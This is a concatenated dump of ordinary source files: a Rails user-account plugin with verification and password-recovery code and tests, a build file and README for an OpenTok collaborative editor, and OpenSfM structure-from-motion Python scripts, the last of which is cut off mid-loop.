self.always_generate_security_token = false
mattr_accessor :user_messenger_from
self.user_messenger_from = "nobody@localhost"
mattr_accessor :site_name
self.site_name = "My Rails Site"
mattr_accessor :root_url
self.root_url = "localhost"
mattr_accessor :default_path
self.default_path = nil # '/dashboards' || :dashboards_path
mattr_accessor :security_token_characters
self.security_token_characters = ('A'..'Z').to_a +
('a'..'z').to_a +
('0'..'9').to_a +
['-', '_', '!', '~']
mattr_accessor :minimum_security_token_length
self.minimum_security_token_length = 30
mattr_accessor :maximum_security_token_length
self.maximum_security_token_length = 50
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require File.join(File.dirname(__FILE__), '..', 'user_system_test_helper')
context 'User', ActiveSupport::TestCase do
setup do
@user = Factory(:user)
end
it 'can change login case' do
@user.login = 'ChEsTeR'
assert_equal 'ChEsTeR', @user.login
@user.save && @user.reload
assert_equal 'ChEsTeR', @user.login
end
it 'cannot change login, except for case' do
@user.login = 'totally_new_login'
assert_equal 'chester', @user.login
end
it 'will not be valid if another user has the same login (case insensitive)' do
u = Factory.build(:user, :email => '<EMAIL>', :login => 'cHESTER')
u.valid?
assert u.errors.on(:login)
end
xit 'should login regardless of login case given' do
assert User.login(:login => 'CHESTer', :passphrase => '<PASSWORD>')
end
context 'With configuration email_is_login', ActiveSupport::TestCase do
setup do
UserSystem.email_is_login = true
end
it 'should not create account without giving an email' do
user = Factory.build(:user, :email => nil)
user.valid?
assert (user.errors.on(:email) || user.errors.on(:login))
end
xit 'should login with an email' do
assert User.login(:login => '<EMAIL>', :passphrase => '<PASSWORD>')
end
end
context 'Without configuration email_is_login', ActiveSupport::TestCase do
setup do
User.delete_all
UserSystem.email_is_login = false
end
xit 'should perform login without giving email adress' do
Factory(:user)
assert User.login(:login => 'chester', :passphrase => '<PASSWORD>')
end
it 'cannot create an account without giving a login' do
user = Factory.build(:user, :login => nil)
user.valid?
assert user.errors.on(:login)
end
context 'With configuration verify email', ActiveSupport::TestCase do
setup do
UserSystem.verify_email = true
end
it 'cannot create an account without giving an email' do
user = Factory.build(:user, :email => nil)
user.valid?
assert user.errors.on(:email)
end
end
context 'Without configuration verify email', ActiveSupport::TestCase do
setup do
User.delete_all
UserSystem.verify_email = false
end
context 'With configuration require email', ActiveSupport::TestCase do
setup do
UserSystem.require_email = true
end
it 'can not create an account without giving an email' do
user = Factory.build(:user, :email => nil)
user.valid?
assert user.errors.on(:email)
end
end
context 'Without configuration require email', ActiveSupport::TestCase do
setup do
UserSystem.require_email = false
end
it 'can create an account without giving an email' do
user = Factory.build(:user, :email => nil)
assert user.valid?
end
end
end
end
context 'With configuration verify_email', ActiveSupport::TestCase do
setup do
UserSystem.verify_email = true
end
it 'should unverify email when email changes' do
assert @user.verified?
@user.email = '<EMAIL>'
assert !@user.verified?
end
end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Create user accounts with this.
#
# Plugins can extend the forms with view_extender. See the view files and
# the view_extender documentation for more information.
#
class UsersController < ApplicationController
skip_before_filter :require_login
include UserRedirect
before_filter :account_creation_should_be_enabled,
:only => [ :new, :create ]
before_filter :security_token_is_not_nil,
:only => [ :verify, :perform_recovery ]
#
# show the form to create a new user
#
def new
@user = User.new
respond_to :html
end
#
# Create a user record
#
def create
u = User.create(params[:user])
if u.new_record?
respond_to do |format|
format.html do
flash[:notice] = 'Unable to create user'
@user = u
render :action => 'new'
end
end
return
end
# send verification email
if UserSystem.verify_email
UserMessenger.deliver_verification(u)
end
respond_to do |format|
format.html do
user_redirect(u)
end
end
end
#
# A link to this action is delivered in an email upon signup.
# By visiting it, the account becomes active.
#
def verify
user = User.find_by_security_token(params[:id])
unless user
respond_to do |format|
format.html do
flash.now[:notice] = "Invalid verification code"
end
end
return
end
user.update_attribute :verified, true
respond_to do |format|
format.html do
user_redirect(user)
end
end
end
#
# Ask the user to verify their email address.
# TODO make user verification is turned on
# TODO make sure they are not already verified
#
def request_verification
if params[:send_email]
@user = User.find_by_email(params[:verification][:email])
if @user
UserMessenger.deliver_verification @user
end
end
respond_to :html
end
#
# User can provide theie email address to have their password reset and
# send to them.
#
def send_recovery
@user = User.find_by_email(params[:user][:email])
unless @user
respond_to do |format|
format.html do
flash[:error] = "Unable to find email address " +
"#{params[:user][:email]}"
render :action => 'recover'
end
end
return
end
@user.update_security_token! 20.minutes
# @user.update_attribute :reset_passphrase, true
UserMessenger.deliver_recovery(@user)
respond_to :html
end
#
# User has ben sent an email because the forgot their password and the
# were sent back here. Give them their account.
#
def perform_recovery
user = User.for_security_token(params[:id])
respond_to do |format|
# html #
format.html do
if user
user_redirect(user)
session[:user_id] = user.id
else
flash[:notice] = 'Invalid or expired token'
redirect_to recover_users_path
end
end
# other formats #
end
end
private
def account_creation_should_be_enabled
unless UserSystem.public_account_creation
render :text => 'Public account creation is disbaled', :status => 404
end
end
def security_token_is_not_nil
if params[:id].nil? or params[:id].empty?
raise ActiveRecord::RecordNotFound
end
end
end
<file_sep>#
# UserAuthentication provides a method create_session to the included class
# that will build and return a session model.
#
# There are three knobs to tweak to modify behavior per-controller.
# auth_module: #login(self) will be called on this class to get back user || nil
# user_model: the class to use to find the user
# session_model: the returned class
#
# Any user-compatible model will define authentication_scope method. Other
# plugins may use it to restrict access. It will return something respoinding
# to .find() like and ActiveRecord model or scope.
#
module UserAuthentication
private
def create_session
auth_module = self.class.send(:auth_module_for_this_controller)
if auth_module
auth_module.login(self)
else
raise "Unconfigured UserSystem -- needs authentication module"
end
end
def user_scope
user = self.class.send(:user_model_for_this_controller)
user.authentication_scope
end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require File.join(File.dirname(__FILE__), '..', 'user_system_test_helper')
context 'Users Controller', ActionController::TestCase do
setup do
@controller = UsersController.new
@request = ActionController::TestRequest.new
@response = ActionController::TestResponse.new
@user = Factory(:user, :verified => true)
end
it 'should show the form with "new" action' do
get 'new'
assert_response 200
end
it 'should send password recovery via email' do
UserMessenger.expects(:deliver_recovery)
post 'send_recovery', {:user => {:email => @user.email} }
assert_response 200
end
it 'should allow password recovery within a limited time range' do
UsersController.any_instance.expects(:user_redirect)
@user.update_security_token!
get 'perform_recovery', :id => @user.security_token
end
it 'should not allow password recovery if request for recovery long ago' do
@user.update_security_token! -1.days
get 'perform_recovery', :id => @user.security_token
assert_redirected_to recover_users_url, flash.inspect
end
context 'With email verification turned on', ActionController::TestCase do
setup do
UserSystem.verify_email = true
@user.update_attribute :verified, false
end
it 'should verify the account with "verify" action' do
get 'verify', {:id => @user.security_token}
@user.reload
assert @user.verified?
end
end
context 'With public account creation', ActionController::TestCase do
setup do
UserSystem.public_account_creation = true
end
it 'should allow creation if public account creation is turned on' do
@user.destroy
post 'create', :user => atr = Factory.attributes_for(:user)
atr.symbolize_keys!
assert User.login(:login => atr[:login], :passphrase => atr[:passphrase])
end
end
context 'Without public account creation', ActionController::TestCase do
setup do
UserSystem.public_account_creation = false
end
it 'should not allow user creation' do
@user.destroy
post 'create', :user => atr = Factory.attributes_for(:user)
assert_response 404
end
end
end
<file_sep>require File.join(File.dirname(__FILE__), '..', 'user_system_test_helper')
require File.join(File.dirname(__FILE__), '..', '..', 'lib', 'user_redirect')
context 'A class including UserRedirect', ActiveSupport::TestCase do
setup do
class M < ActionController::Base
include UserRedirect
end
@kls = M.new
@kls.session = {}
@kls.request = ActionController::TestRequest.new
@kls.response = ActionController::TestResponse.new
@user = Factory(:user)
@user.verified = true
end
it 'should not have an empty callback chain' do
assert !M.on_redirection_callback_chain.empty?
end
it 'should walk through callbacks when redirecting' do
M.on_redirection_callback_chain.each{|c| @kls.expects(c.method) }
@kls.stubs(:root_path).returns('/')
@kls.send(:user_redirect, @user)
end
it 'should not call callbacks after one redirects' do
@user.verified = false
@kls.expects(:inform_disabled).never
end
context 'that has more callbacks added after included once', ActiveSupport::TestCase do
setup do
module Ext
def new_callback
# no op
end
end
UserRedirect.send :include, Ext
UserRedirect.send :on_redirection, :new_callback
end
it 'should add new callbacks to old include' do
assert M.on_redirection_callback_chain.detect{|x| x.method == :new_callback}
end
it 'should add all callbacks to new include' do
class C2 < ActionController::Base
include UserRedirect
end
assert C2.on_redirection_callback_chain.detect{|x| x.method == :new_callback}
end
end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
module UserSystemLoginFilters
private
def self.included(kls)
kls.send :extend, ClassMethods
kls.send :helper_method, :current_user
end
#
# So any controller can call current_user to get the logged in user
#
def current_user
@usys_logged_in_user ||= lookup_user
end
#
# This is the fallback case. It can be alias-chained by other plugins.
#
def lookup_user
self.class.send(:session_model_for_this_controller).find_by_id(
session[:session_id]
).try(:user)
end
#
# Make sure a user is stored in the session.
# before_filter :require_login
#
def require_login
unless current_user
session[:last_params] = params
redirect_to login_url_for_this_controller
return
end
validate_user(current_user)
end
#
# This method is used internally by only_for_user class method
#
def require_user_login *valid_users
if !current_user or (!valid_users.empty? and !valid_users.include?(current_user))
# TODO: if current_user, but not valid, use 403, otherwise 401
session[:last_params] = params
flash[:notice] = 'You need to login to proceed.'
redirect_to login_url_for_this_controller
return
else
true
end
end
def login_url_for_this_controller
rv = self.class.read_inheritable_attribute(:login_url)
if h=self.class.read_inheritable_attribute(:login_url_helper)
rv = self.send(h)
end
rv ||= new_session_url
rv
end
def login_post_url_for_this_controller
rv = self.class.read_inheritable_attribute(:login_post_url)
if h=self.class.read_inheritable_attribute(:login_post_url_helper)
rv = self.send(h)
end
rv ||= sessions_url
rv
end
def login_template_for_this_controller
rv = self.class.read_inheritable_attribute(:login_template)
rv ||= "/sessions/new"
rv
end
module ClassMethods
#
# Mark this controller (or certin actions using :only => ...)
# as protected and only accessable for certain users.
#
def only_for_user *users
options = users.last.is_a?(Hash) ? users.pop : {}
_users = users.collect{|x| userify(x) }
before_filter(options) do |inst|
inst.send :require_user_login, *_users
end
end
private
# internal helper
def to_model(str_or_model, model_class, finder)
if str_or_model.is_a?(model_class)
str_or_model
else
model_class.send(finder, str_or_model.downcase)
end
end
# internal helper
def userify(str_or_user)
to_model(str_or_user, user_model_for_this_controller, :find_by_name)
end
def auth_module_for_this_controller
read_inheritable_attribute(:auth_module)
end
def session_model_for_this_controller
read_inheritable_attribute(:session_model) || Session
end
def user_model_for_this_controller
atr = read_inheritable_attribute(:user_model)
atr ? atr.to_s.camelize.constantize : User
end
end
end
<file_sep># Copyright (c) 2009 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
class UserSystemMigrator < ActiveRecord::Migrator
def initialize direction, migrations_path, target_version=nil
unless ActiveRecord::Base.connection.supports_migrations?
raise StandardError.new("This database does not yet support migrations")
end
initialize_schema_migrations_table(ActiveRecord::Base.connection)
@direction, @migrations_path, @target_version = direction, migrations_path, target_version
end
def self.schema_migrations_table_name
'plugin_schema_migrations_user_system'
end
private
def initialize_schema_migrations_table connection
name = self.class.schema_migrations_table_name
return if connection.tables.detect{|t| t == name}
connection.create_table(name, :id => false) do |t|
t.column :version, :string, :null => false
end
connection.add_index(
name,
:version,
:unique => true,
:name => "unique_schema_usersystem"
)
end
end
<file_sep>##
# A session controls access for a user
#
class Session < ActiveRecord::Base
belongs_to :user
end
| 8525279e5db0cc1720752f423ad96df83dec0b0d | [
"Ruby"
] | 17 | Ruby | rubidine/user_system | 17c81dfd8248db9ced7ff46cbcd79d4f1245807e | 13fef855b89e1fd0bf2a74a66bce631f1fb12a39 |
refs/heads/master | <file_sep>var gulp = require('gulp'),
bower = require('gulp-bower'),
jshint = require('gulp-jshint'),
rename = require('gulp-rename'),
concat = require('gulp-concat'),
uglify = require('gulp-uglify');
gulp.task('bower', function () {
return bower();
});
gulp.task('default', ['bower'], function() {
gulp.src(['bower_components/ot/dist/ot.js', 'bower_components/ot/lib/server.js', 'src/*.js'])
.pipe(jshint())
.pipe(concat('opentok-editor.js'))
.pipe(gulp.dest('./'))
.pipe(uglify({preserveComments: "some"}))
.pipe(rename('opentok-editor.min.js'))
.pipe(gulp.dest('./'));
});<file_sep>[](https://travis-ci.org/aullman/opentok-editor)
[](https://codeclimate.com/github/aullman/opentok-editor)
[](https://codeclimate.com/github/aullman/opentok-editor)
# opentok-editor
A real time collaborative editor for OpenTok using CodeMirror and ot.js. More information in [this blog article](http://www.tokbox.com/blog/collaborative-editor/).
## Installation
### npm with webpack or browserify:
`npm install opentok-editor`
```js
require('opentok-editor');
require('opentok-editor/opentok-editor.css');
```
### [Bower](http://bower.io/):
`bower install opentok-editor`
or clone this repo and include the `opentok-editor.js` or `opentok-editor.min.js` file.
## Usage
See [index.html](index.html). You will need to replace the values for API_KEY, SESSION_ID and TOKEN with values using your [OpenTok](https://www.tokbox.com/opentok) account. Then you can run `npm start` and go to localhost:8080 in your browser.
## How to Build Yourself
Keep all custom changes to the `src/` files and then run:
```
npm install
```
Which will install all bower components and run the gulp build to build the `opentok-editor.js` and `opentok-editor.min.js` files.
| 97ddd1af84eadaa1a4dce6c8f8c981fdfdbf26da | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | aullman/opentok-editor | 9165cefbdd4c75d2e3771d312400bddf77357601 | cce3d384adf1bc7565341a6b01a2c4221f12d2aa |
refs/heads/master | <file_sep># tmo-committee-data
Process TMO Committee Data and publish it to the web.
<file_sep>import os
import pandas
from configparser import ConfigParser
from ftplib import FTP
def lambda_handler(event, context):
# read the config file and assign values
print("### Read the config file and assign values")
config = ConfigParser()
config.read('config.txt')
gsheet_url = config.get('gsheet','url')
ftp_host = config.get('ftp','host')
ftp_user = config.get('ftp','user')
ftp_pass = config.get('ftp','pass')
work_dir = config.get('local','dir')
# check for the working directory and create it if needed
print("### Check for the local directory and create it if needed")
if not os.path.exists(work_dir):
os.makedirs(work_dir)
# change directory to the working directory
print("### Change to the local directory")
os.chdir(work_dir)
# remove the column bounds
pandas.set_option('display.expand_frame_repr', False)
# get the data or die
print("### Get the data from Google Sheets")
p = pandas.read_csv(gsheet_url)
# open ftp or die
print("### Open a connection to the FTP host")
ftp = FTP(ftp_host)
ftp.login(ftp_user, ftp_pass)
# incoming column number and names
# 0 'Timestamp',
# 1 '<NAME>',
# 2 '<NAME>',
# 3 'Phone Number (in xxx-xxx-xxxx format)',
# 4 'Phone Number Type',
# 5 'Preferred Email Address',
# 6 'Contact Preference',
# 7 'Target Committees (select at least one)',
target_committees = [
"Target 1: HBCU for Life: A Call to Action",
"Target 2: Women's Healthcare and Wellness",
"Target 3: Building Your Economic Legacy",
"Target 4: The Arts!",
"Target 5: Global Impact",
"Signature Program: #CAP (College Admissions Process)",
]
# simplify the column names
print("### Simplify the column names")
p.rename(columns={'Phone Number (in xxx-xxx-xxxx format)':'Phone Number'}, inplace=True)
p.rename(columns={'Target Committees (select at least one)':'Target Committees'}, inplace=True)
# drop duplicates by email address
print("### Drop duplicates by email address")
p.drop_duplicates('Preferred Email Address', inplace=True)
# process all member details, sorted by last name
print("### Process all member details, sorted by last name")
p.iloc[:, 1:9].sort_values(by=['Last Name'], ascending=True).to_csv('members.csv')
p.iloc[:, 1:9].sort_values(by=['Last Name'], ascending=True).to_html('members.html')
ftp.storbinary('STOR ' + 'members.html', open ('members.html', 'rb'))
ftp.storbinary('STOR ' + 'members.csv', open ('members.csv', 'rb'))
# process target committees with member details
print("### Process target committees with member details")
for committee in target_committees:
committee_filename = ''.join(e for e in committee if e.isalnum())
pslice = p[ p['Target Committees'].str.contains(committee, na=False) ]
pslice.iloc[:, 1:9].sort_values(by=['Last Name'], ascending=True).to_csv(committee_filename + '.csv')
pslice.iloc[:, 1:9].sort_values(by=['Last Name'], ascending=True).to_html(committee_filename + '.html')
ftp.storlines('STOR ' + committee_filename + '.html', open (committee_filename + '.html', 'rb'))
ftp.storlines('STOR ' + committee_filename + '.csv', open (committee_filename + '.csv', 'rb'))
if __name__ == '__main__':
lambda_handler(None, 'handler') | 471572e62c02b54c5c2e3e155e5da26438b0affb | [
"Markdown",
"Python"
] | 2 | Markdown | managedkaos/tmo-committee-data | f41180ac36acf2184bdf5cec506f661fb47f77ae | c4988c5554022b384b1b43031606c4df08059530 |
refs/heads/master | <file_sep>#!/usr/bin/env python
from distutils.core import setup, Extension
import numpy as np
import os
import glob
default_include_dirs = [
'/usr/local/include',
'/usr/include',
]
cplus_include_path = os.getenv('CPLUS_INCLUDE_PATH', '')
if cplus_include_path:
default_include_dirs.extend(cplus_include_path.split(':'))
def find_path(name, hints, path_suffixes=[]):
suffixes = [''] + path_suffixes
for c in hints:
for s in suffixes:
path = os.path.join(c, s)
if os.path.isfile(os.path.join(path, name)):
return path
return None
def find_include(name, hints, path_suffixes=[]):
return find_path(name, hints + default_include_dirs, path_suffixes)
libraries = []
library_dirs = ['/usr/local/lib']
# Eigen
eigen_include_dir = find_include('Eigen/Core', [], ['eigen3'])
# Ceres
ceres_libraries = ['ceres', 'glog', 'gflags']
libraries.extend(ceres_libraries)
# Boost Python
boost_python_libraries = ['boost_python']
libraries.extend(boost_python_libraries)
# Akaze
akaze_include_dir = 'opensfm/src/third_party/akaze/lib'
akaze_sources = [
'opensfm/src/third_party/akaze/lib/AKAZE.cpp',
'opensfm/src/third_party/akaze/lib/fed.cpp',
'opensfm/src/third_party/akaze/lib/nldiffusion_functions.cpp',
'opensfm/src/third_party/akaze/lib/utils.cpp',
]
akaze_depends = [
'opensfm/src/third_party/akaze/lib/AKAZEConfig.h',
'opensfm/src/third_party/akaze/lib/AKAZE.h',
'opensfm/src/third_party/akaze/lib/fed.h',
'opensfm/src/third_party/akaze/lib/nldiffusion_functions.h',
'opensfm/src/third_party/akaze/lib/utils.h',
]
akaze_library = ('akaze', {
'sources': akaze_sources,
'depends': akaze_depends,
'include_dirs': [akaze_include_dir],
})
# libmv
libmv_include_dir = 'opensfm/src/third_party'
libmv_sources = [
'opensfm/src/third_party/libmv/multiview/fundamental.cc',
'opensfm/src/third_party/libmv/multiview/projection.cc',
'opensfm/src/third_party/libmv/multiview/five_point.cc',
'opensfm/src/third_party/libmv/multiview/robust_five_point.cc',
'opensfm/src/third_party/libmv/multiview/triangulation.cc',
'opensfm/src/third_party/libmv/multiview/conditioning.cc',
'opensfm/src/third_party/libmv/numeric/numeric.cc',
'opensfm/src/third_party/libmv/numeric/poly.cc',
]
libmv_library = ('mv', {
'sources': libmv_sources,
'include_dirs': [libmv_include_dir, eigen_include_dir],
})
# VLFeat
vlfeat_include_dir = 'opensfm/src/third_party/vlfeat'
vlfeat_sources = glob.glob('opensfm/src/third_party/vlfeat/vl/*.c')
vlfeat_depends = glob.glob('opensfm/src/third_party/vlfeat/vl/*.h')
vlfeat_library = ('vl', {
'sources': vlfeat_sources,
'depends': vlfeat_depends,
'macros': [('VL_DISABLE_AVX', '1')],
})
# cSfM
csfm_extension = Extension(
'opensfm.csfm',
sources=['opensfm/src/csfm.cc'],
depends=['bundle.h'],
include_dirs=[
np.get_include(),
eigen_include_dir,
libmv_include_dir,
akaze_include_dir,
vlfeat_include_dir,
],
libraries=libraries,
library_dirs = library_dirs,
extra_compile_args=['-std=c++11'],
)
setup(
name='OpenSfM',
version='0.1',
description='A Structure from Motion library',
url='https://github.com/mapillary/OpenSfM',
author='Mapillary',
license='BSD',
packages=['opensfm'],
libraries=[vlfeat_library, libmv_library, akaze_library],
ext_modules=[csfm_extension],
)
<file_sep>import numpy as np
import json
import cv2
# pairwise matches
def match_lowe(index, f2, config):
search_params = dict(checks=config.get('flann_checks', 200))
results, dists = index.knnSearch(f2, 2, params=search_params)
good = dists[:, 0] < config.get('lowes_ratio', 0.6) * dists[:, 1]
matches = zip(results[good, 0], good.nonzero()[0])
return np.array(matches, dtype=int)
def match_symmetric(fi, indexi, fj, indexj, config):
if config.get('matcher_type', 'FLANN') == 'FLANN':
matches_ij = [(a,b) for a,b in match_lowe(indexi, fj, config)]
matches_ji = [(b,a) for a,b in match_lowe(indexj, fi, config)]
else:
matches_ij = [(a,b) for a,b in match_lowe_bf(fi, fj, config)]
matches_ji = [(b,a) for a,b in match_lowe_bf(fj, fi, config)]
matches = set(matches_ij).intersection(set(matches_ji))
return np.array(list(matches), dtype=int)
def convert_matches_to_vector(matches):
'''Convert Dmatch object to matrix form
'''
matches_vector = np.zeros((len(matches),2),dtype=np.int)
k = 0
for mm in matches:
matches_vector[k,0] = mm.queryIdx
matches_vector[k,1] = mm.trainIdx
k = k+1
return matches_vector
def match_lowe_bf(f1, f2, config):
'''Bruteforce feature matching
'''
assert(f1.dtype.type==f2.dtype.type)
if (f1.dtype.type == np.uint8):
matcher_type = 'BruteForce-Hamming'
else:
matcher_type = 'BruteForce'
matcher = cv2.DescriptorMatcher_create(matcher_type)
matches = matcher.knnMatch(f1, f2, k=2 )
good_matches = []
for m,n in matches:
if m.distance < config.get('lowes_ratio', 0.6)*n.distance:
good_matches.append(m)
good_matches = convert_matches_to_vector(good_matches)
return np.array(good_matches, dtype=int)
def robust_match(p1, p2, matches, config):
'''Computes robust matches by estimating the Fundamental matrix via RANSAC.
'''
if len(matches) < 8:
return np.array([])
p1 = p1[matches[:, 0]][:, :2].copy()
p2 = p2[matches[:, 1]][:, :2].copy()
F, mask = cv2.findFundamentalMat(p1, p2, cv2.cv.CV_FM_RANSAC, config.get('robust_matching_threshold', 0.006), 0.99)
inliers = mask.ravel().nonzero()
return matches[inliers]
<file_sep>#!/usr/bin/env bash
trash=$1/trash/`date -u +"%Y-%m-%dT%H:%M:%SZ"`
mkdir -p $trash
rm -rf trash/*
mv -vf $1/reconstruction*.json $trash
mv -vf $1/exif $trash
mv -vf $1/robust_matches $trash
mv -vf $1/sift $trash
mv -vf $1/surf $trash
mv -vf $1/akaze* $trash
mv -vf $1/root* $trash
mv -vf $1/hahog $trash
mv -vf $1/camera_models.json $trash
mv -vf $1/reference_lla.json $trash
mv -vf $1/profile.log $trash
mv -vf $1/navigation_graph.json $trash
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import numpy as np
from itertools import combinations
import argparse
import networkx as nx
from opensfm import dataset
from opensfm import features
import logging
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)
def good_track(track, min_length):
if len(track) < min_length:
return False
images = [f[0] for f in track]
if len(images) != len(set(images)):
return False
return True
parser = argparse.ArgumentParser(description='Create tracks by grouping the robust matches')
parser.add_argument('dataset',
help='path to the dataset to be processed')
args = parser.parse_args()
data = dataset.DataSet(args.dataset)
images = data.images()
# Read local features
logging.info('reading features')
feature = {}
for im in images:
p1, f1 = data.load_features(im)
feature[im] = p1[:,:2]
logging.info('creating features graph')
g = nx.Graph()
for im1 in images:
for im2 in images:
try:
matches = data.load_matches(im1, im2)
for f1, f2 in matches:
g.add_edge((im1, f1), (im2, f2))
except IOError:
pass
logging.info('finding connected components')
tracks = nx.connected_components(g)
tracks = [t for t in tracks if good_track(t, data.config.get('min_track_length', 2))]
logging.info('Good tracks: %d', len(tracks))
tracks_graph = nx.Graph()
for track_id, track in enumerate(tracks):
for image_feature in track:
image = image_feature[0]
featureid = image_feature[1]
x, y = feature[image][featureid]
tracks_graph.add_node(image, bipartite=0)
tracks_graph.add_node(track_id, bipartite=1)
tracks_graph.add_edge(image, track_id, feature=(x,y), feature_id=featureid)
data.save_tracks_graph(tracks_graph)
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import argparse
import time
import json
import numpy as np
import scipy.spatial
from opensfm import dataset
from opensfm import reconstruction
if __name__ == "__main__":
start = time.time()
parser = argparse.ArgumentParser(description='Add delaunay mesh to the reconstruction')
parser.add_argument('dataset',
help='path to the dataset to be processed')
args = parser.parse_args()
data = dataset.DataSet(args.dataset)
graph = data.load_tracks_graph()
reconstructions = data.load_reconstruction()
for r in reconstructions:
for shot_id, shot in r['shots'].items():
if shot_id not in graph:
continue
cam = r['cameras'][shot['camera']]
dx = float(cam['width']) / 2 / max(cam['width'], cam['height'])
dy = float(cam['height']) / 2 / max(cam['width'], cam['height'])
pixels = [[-dx, -dy], [-dx, dy], [dx, dy], [dx, -dy]]
vertices = [None for i in range(4)]
for track_id, edge in graph[shot_id].items():
if track_id in r['points']:
point = r['points'][track_id]
vertices.append(point['coordinates'])
pixel = reconstruction.reproject(cam, shot, point)
pixels.append(pixel.tolist())
tri = scipy.spatial.Delaunay(pixels)
sums = [0.,0.,0.,0.]
depths = [0.,0.,0.,0.]
for t in tri.simplices:
for i in range(4):
if i in t:
for j in t:
if j >= 4:
depths[i] += reconstruction.camera_coordinates(cam, shot, vertices[j])[2]
sums[i] += 1
for i in range(4):
vertices[i] = reconstruction.back_project(cam, shot, pixels[i], depths[i] / sums[i]).tolist()
faces = tri.simplices.tolist()
